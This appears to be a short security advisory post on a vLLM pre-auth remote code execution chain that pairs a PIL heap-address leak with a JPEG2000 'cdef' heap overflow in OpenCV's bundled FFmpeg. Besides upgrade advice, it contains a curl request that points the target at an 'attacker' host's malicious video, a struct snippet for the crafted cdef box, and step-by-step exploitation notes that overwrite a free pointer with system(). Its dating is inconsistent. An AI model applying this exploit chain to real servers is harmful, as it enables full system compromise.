Listen to this Post
The vulnerability chain in vLLM (<0.14.1) enables pre-auth Remote Code Execution (RCE) when processing a malicious video URL. The attack exploits two flaws. First, an information leak occurs when PIL (Python Imaging Library) returns error messages containing heap addresses from invalid images, effectively bypassing ASLR. Second, a heap buffer overflow exists in the JPEG2000 decoder within OpenCV’s bundled FFmpeg (version 5.1.x). The overflow is triggered via a crafted ‘cdef’ box in a JPEG2000 frame inside a video container (e.g., MOV). The ‘cdef’ box remaps color channels; by setting the association (Asoc) value to 2, the decoder is forced to write the full-resolution luma (Y) plane data into the smaller chroma (U) plane buffer. For a 150×64 image, this causes 7,200 bytes (9,600 – 2,400) to overflow the heap buffer. This corruption can overwrite critical function pointers, such as the `free` pointer in an `AVBuffer` structure. By overwriting this with `system()` and setting the associated opaque data pointer to an attacker-controlled command string, arbitrary code executes when the buffer is freed. vLLM’s video decoding pipeline, which uses `cv2.VideoCapture()` on downloaded bytes, passes the malicious content directly to this vulnerable decoder.
Platform: vLLM
Version: < 0.14.1
Vulnerability: Heap Overflow
Severity: Critical
date: Unknown
Prediction: 2024-11-13
What Undercode Say:
curl -X POST http://target:8000/v1/chat/completions -H "Content-Type: application/json" -d '{"model":"video-model","messages":[{"role":"user","content":[{"type":"video_url","video_url":{"url":"http://attacker/malicious.mov"}}]}]}'
Malicious cdef box structure
cdef_box = struct.pack('>I4sHHHHHHHH',
0x16, b'cdef',
0x0003,
0x0000, 0x0000, 0x0002, Y -> U
0x0001, 0x0000, 0x0001, U -> Y
0x0002, 0x0000, 0x0003) V -> V
How Exploit:
- Leak heap address via PIL error by sending invalid image.
2. Calculate libc base using known offset.
- Craft MOV file with JPEG2000 frame containing malicious ‘cdef’ channel remapping.
4. Target `AVBuffer->free` pointer to point to `system()`.
5. Set `AVBuffer->opaque` to point to command string.
6. Trigger free via API request with `video_url`.
Protection from this CVE
Upgrade vLLM to version 0.14.1 or later. For OpenCV, ensure bundled FFmpeg is updated beyond vulnerable 5.1.x versions. Implement API key authentication. Restrict video model endpoints or disable video modality if unused. Use sandboxing for vLLM processes.
Impact:
Remote Code Execution. Full system compromise. Bypasses authentication.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

